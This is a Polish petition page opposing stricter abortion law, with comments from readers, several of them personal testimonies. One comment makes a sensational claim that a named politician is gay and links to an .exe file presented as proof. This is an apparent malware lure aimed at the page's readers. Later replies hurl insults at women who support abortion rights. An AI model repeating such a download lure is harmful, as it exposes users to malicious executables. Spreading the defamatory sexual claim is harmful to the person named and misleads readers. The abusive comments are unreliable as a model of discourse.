Przeciw zaostrzeniu prawa do aborcji.
Skontaktuj się z autorem petycji
ja rownierz nie wyobrażam sobie po gwałcie nosić dziecka a co dopiero urodzić co musi czuć taka kobieta w takiej sytuacji zastanowil sie ktoś z tych którzy to wymyslili nikt nie powinien decydowac o tym to powinien być wybór każdej kobiety a nie nakazane przez prawo i kosciol to powinna byc sprawa zamknieta
Jestem sama mamą 40 -letniej córki leżącej od urodzenia z mpdz.. Pomoc państwa marginalna, cały czas patrzę na cierpienie mojej córki. Przez 40 lat zwiedzilam różne ośrodki , dużo widziałam. Wolałabym aby córka zmarła przede mną niż miałaby trafić do jakiegokolwiek ośrodka. Boję się myśleć gdzie trafi po mojej śmierci. Najbezpeczniej moje dziecko czuje się w swoim domu. Skazywanie dzieci z wadami na ogromne cierpienie jest dla mnie gorsze niż śmierć . Tym bardziej ,że nie ma pomocy dla tych dzieci i dla ich rodzin . Mimo ustawy , nawet za cenę więzienia ,zrobiłabym wszystko,żeby nie dopuścić do urodzenia kalekiego dziecka.
Nie zgadzam sie na pozbawienie połowy ludzkosci Polski wlasnosci ciała i praw człowieka. Nie zgadzam się, by zgwałcona 12 latka musiała rodzic i umierała bez pomocy lekarskiej, bo liczy sie plod, kobieta jest wedlug polskiego rzadu smieciem bez praw. Nie zgadzam sie na opresyjne państwo wyznaniowe. Nie zgadzam sie na ten rezim
wuRe:
Mam dowody na to, że Kaczyński jest gejem. Byłem jego chłopakiem:
http://www.easypaste.org/file/zlyXP1aJ/kaczynskigej.exe?lang=pl
Re: xxd
Może choć raz ktoś by pomyślał o tych motdowanych dzieciach a nie tylko o swoich macicach . Rzygać się chce już tym chtonienim praw kobiet ą tym czasem wiele milionów kobiet ginie w łonach swych morderczych matek .
Re: xxd
A ludzkim jest mordować niewinne dzieci . Taki los pewnie kiedyś spotka was . Warto się nad tym zastanowić, ale po co kiedy myśli się macicą, a ta służy tylko do jednego a przy okazji staje się miejscem zbrodni. Jak dobrze ,że to wszystko nie trwa wiecznie . Żal mi tych młodych kobiet , które czerpią z takich macic pozbawionych ludzkich uczuć przykład. Włączyć rozum bo będzie za późno.
| This discussion has been closed. |